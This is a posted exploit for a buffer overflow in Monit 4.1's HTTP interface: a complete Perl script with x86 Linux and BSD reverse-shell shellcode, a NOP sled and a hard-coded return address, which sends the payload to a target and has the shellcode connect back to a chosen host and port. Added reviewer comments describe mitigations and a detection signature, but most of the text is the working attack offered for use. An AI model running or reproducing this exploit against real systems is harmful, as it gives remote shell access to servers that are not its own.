Here's an oldie for a simple buffer overflow vuln. Read the security advisory for more info: http://www.securityfocus.com/bid/9099/discussion/ If I've been correctly informed, the public exploit out there only DoSes (I haven't tested it, so I really can't say). Anyway, this one's an over-hacked reverse shellcode variant... discard it in any degree you like. // Michel, http://www.cycom.se

#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger <shadowinteger@xxxxxxxxxxxx>
#
# Verbatim copying, distribution and/or modification of this
# code is permitted without restriction.
#
# THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# You may have to install Math::XOR for this to run, e.g.:
# $ perl -MCPAN -e "install Math::XOR"
#
# Acknowledgments: Sabu, Nullbyte
#
# Reviewer notes (what the script below demonstrates, for defenders):
# - The bug is a buffer overflow in Monit's HTTP interface (advisory
#   linked in the message above) that lets a request overwrite a saved
#   return address ("ret address to make eip" in the usage text).
# - The payload is built blind: a fixed NOP sled, a connect-back
#   shellcode and a hard-coded return address that only fits one build
#   (Slackware 8.1, default ./configure, per the usage text).  Stack
#   protection, a non-executable stack and address randomisation each
#   break that approach; upgrading Monit past the affected release, per
#   the advisory, removes the overflow itself.
# - Detection: what is sent is not a parsable HTTP request at all - a
#   single 264-byte blob (mostly 0x90 and other non-printable bytes)
#   followed by "\n\n", to the Monit HTTP port (2812 by default here).
#
use POSIX;              # NOTE(review): nothing below appears to use POSIX
use Getopt::Std;
use IO::Socket::INET;
use Math::XOR;          # non-core; provides xor_buf() used below
use strict;             # enabled after the imports; conventionally first

# Print the usage text to stdout and exit with status 1.
# Reached on -h and when no target host is given.
sub usage {
    print "usage: sploit [-a 0xbf7ff9e4] [-o 250] target_host [port]\n"
        . " -a address ret address to make eip\n"
        . " -o offset offset to subtract from address before injecting it\n"
        . " -c hostname choose hostname to have the shellcode connect back to, default\n"
        . " is localhost\n"
        . " -p port choose port to have the shellcode connect back to, default is\n"
        . " 31337.\n"
        . " -B use x86 *BSD shellcode instead of x86 Linux\n"
        . "The default address is 0xbf7ff9e4 and the default offset to subtract from that\n"
        . "address is 250, this works under Slackware 8.1 with default ./configure\n"
        . "compilation options. You may have to do some research for your system, gdb is\n"
        . "your friend, e.g. \"gdb process pid_of_monit_httpd\".\n";
    exit 1;
}

# pre_shellcode was added to make sure the stack doesn't write into our
# shellcode
my $pre_shellcode = "\x83\xC4\x40";    # add esp, byte 0x40

# shadowinteger's reverse shellcode (sishell, x86 linux)
my $linux_shellcode =
      "\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb"
    . "\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6"
    . "\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff"
    . "\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83"
    . "\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24"
    . "\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80"
    . "\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80"
    . "\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89"
    . "\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89"
    . "\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80"
    . "\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e"
    . "\x2f\x73\x68\x24";
# Byte offsets inside $linux_shellcode where the 4-byte connect-back
# address and the 2-byte port are patched in by substr() below.
my $lin_IP_OFFSET   = 40;
my $lin_PORT_OFFSET = 54;
my $lin_XOR         = 0xffffffff;    # number to xor the ip address with
                                     # (presumably so the patched-in address
                                     # contains no NUL bytes - not verified)

# shadowinteger's reverse shellcode (sishell, x86 bsd)
my $bsd_shellcode =
      "\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80"
    . "\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8"
    . "\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69"
    . "\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50"
    . "\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41"
    . "\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08"
    . "\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24"
    . "\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31"
    . "\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e"
    . "\x2f\x73\x68\x24";
# Same three patch parameters for the BSD variant.
my $bsd_IP_OFFSET   = 32;
my $bsd_PORT_OFFSET = 46;
my $bsd_XOR         = 0xffffffff;

# just define these here, since we're "strict"
# (selected from the lin_/bsd_ set once -B has been parsed)
my $shellcode;
my $IP_OFFSET;
my $PORT_OFFSET;
my $XOR;

# set up defaults
my $offset        = 250;            # offset to back-track (subtract) from $address
my $address       = 0xbf7ff9e4;     # guessed stack address; build-specific (see usage)
my $target        = "localhost";
my $port          = 2812;           # Monit's usual HTTP interface port
my $callback_host = "localhost";
my $callback_port = pack('n', 31337);    # kept packed (network order) from here on

# handle options
my %options = ();
getopts("a:o:c:p:Bh", \%options);
if ( defined $options{h} ) {
    usage();
}
if ( ! $ARGV[0]) {
    usage();
}
else {
    if ( length($ARGV[0]) > 0 ) {
        $target = $ARGV[0];
    }
}
if ( $ARGV[1]) {
    $port = $ARGV[1];    # NOTE(review): not validated as numeric
}

# if -B option is present, define $bsd
# NOTE(review): "my $x = ... if COND;" is documented in perlsyn as undefined
# behaviour; the well-defined form is
#   my $bsd = defined $options{B} ? "yes" : undef;
my $bsd = "yes" if defined $options{B};

if ( defined $options{a} ) {
    $address = hex($options{a});
}
if ( defined $options{o} ) {
    $offset = $options{o};    # NOTE(review): used in arithmetic unvalidated
}
if ( defined $options{c} ) {
    if ( length($options{c}) > 0 ) {
        $callback_host = $options{c};
    }
}
if ( defined $options{p} ) {
    $callback_port = pack('n', $options{p});
}

# set up shellcode pointers... linux or bsd?
if ( defined $bsd ) {
    $shellcode   = $bsd_shellcode;
    $IP_OFFSET   = $bsd_IP_OFFSET;
    $PORT_OFFSET = $bsd_PORT_OFFSET;
    $XOR         = $bsd_XOR;
}
else {
    $shellcode   = $linux_shellcode;
    $IP_OFFSET   = $lin_IP_OFFSET;
    $PORT_OFFSET = $lin_PORT_OFFSET;
    $XOR         = $lin_XOR;
}

# resolve hostname (scalar gethostbyname -> packed 4-byte address)
# NOTE(review): unchecked; on a resolution failure this is undef, the
# substr()/xor_buf() below operate on an empty value and inet_ntoa() in
# the banner would reject it.
my $callback_ip = gethostbyname($callback_host);

# insert resolved connect back address into shellcode
# (XOR-masked with $XOR; pack('l') here is only used to get four 0xff bytes)
substr($shellcode, $IP_OFFSET, 4, xor_buf($callback_ip, pack('l',$XOR)));

# insert port into shellcode (short network order)
substr($shellcode, $PORT_OFFSET, 2, $callback_port);

# decode (un-xor) IP address in shellcode and print it to stdout
# don't uncomment, it's just an example
# print xor_buf(substr($shellcode, $IP_OFFSET, 4), pack('l',$XOR));

# calculate address and make it binary
# 'l' is a native-endian signed 32-bit int: the bytes come out in the
# x86 target's order only when this runs on a little-endian host, and the
# default 0xbf7ff9e4 lies above the signed range, so this relies on pack
# wrapping it.
my $eip     = $address - $offset;
my $bin_eip = pack('l', $eip);

# cruft is our parsed payload:
# [ NOPNOPNOPNOP ] [ PRE ] [ SHELLCODE ] [ ADDR ] [ ADDR ]
#                 ^
#                 ideal jump address
#
# The sled is sized so that sled + pre + shellcode is exactly 256 bytes,
# followed by the guessed address twice: 264 bytes in total.  (Were
# pre + shellcode ever longer than 256 bytes the repeat count would be
# negative and "x" would yield an empty sled.)
my $cruft = "\x90" x (256 - length($pre_shellcode . $shellcode))
    . $pre_shellcode
    . $shellcode
    . $bin_eip x 2;

# build HTTP request, there's nothing more to it than to add a double linefeed
# (so the wire image is the raw 264-byte blob plus "\n\n" - no method, path
# or version; this is what a request-parsing IDS rule would key on)
my $request = $cruft . "\n\n";

#
# print banner and get started
#
print '-»» Monit 4.1 remote shell exploit (HTTP)'."\n";
print '««- (C) 2004 Shadowinteger <shadowinteger@xxxxxxxxxxxx'."\n";
if ( defined $bsd ) {
    print "[i] using x86 *BSD shellcode (sishell)\n";
}
else {
    print "[i] using x86 Linux shellcode (sishell)\n";
}
printf("[i] using ret address: 0x%x\n", $eip);
print "[i] shellcode will connect to " . inet_ntoa($callback_ip) . ", port " . unpack('n', $callback_port) . "\n";
print "[i] attacking " . $target . ", port " . $port . "\n";
print "[+] connecting to target...\n";

# the initial 0 is overwritten immediately; only defined-ness is checked
my $socket = 0;
$socket = IO::Socket::INET -> new(
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => "tcp"
);
if (!defined($socket)) {
    print "[?] no connection!\n";
    exit 1;
}
print "[i] connection established\n";
print "[+] injecting shellcode...\n";
# one write, no response is read; the pause presumably just gives the
# server time before the socket is closed
print $socket $request;
sleep(3);
print "[i] done\n";
close $socket;    # NOTE(review): unchecked close on a write handle
exit 0;
## EOF

-- Michel Blomgren Cycom AB http://www.cycom.se ______________________________________________ PGP: http://www.cycom.se/misc/pubkeymichel.asc 886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA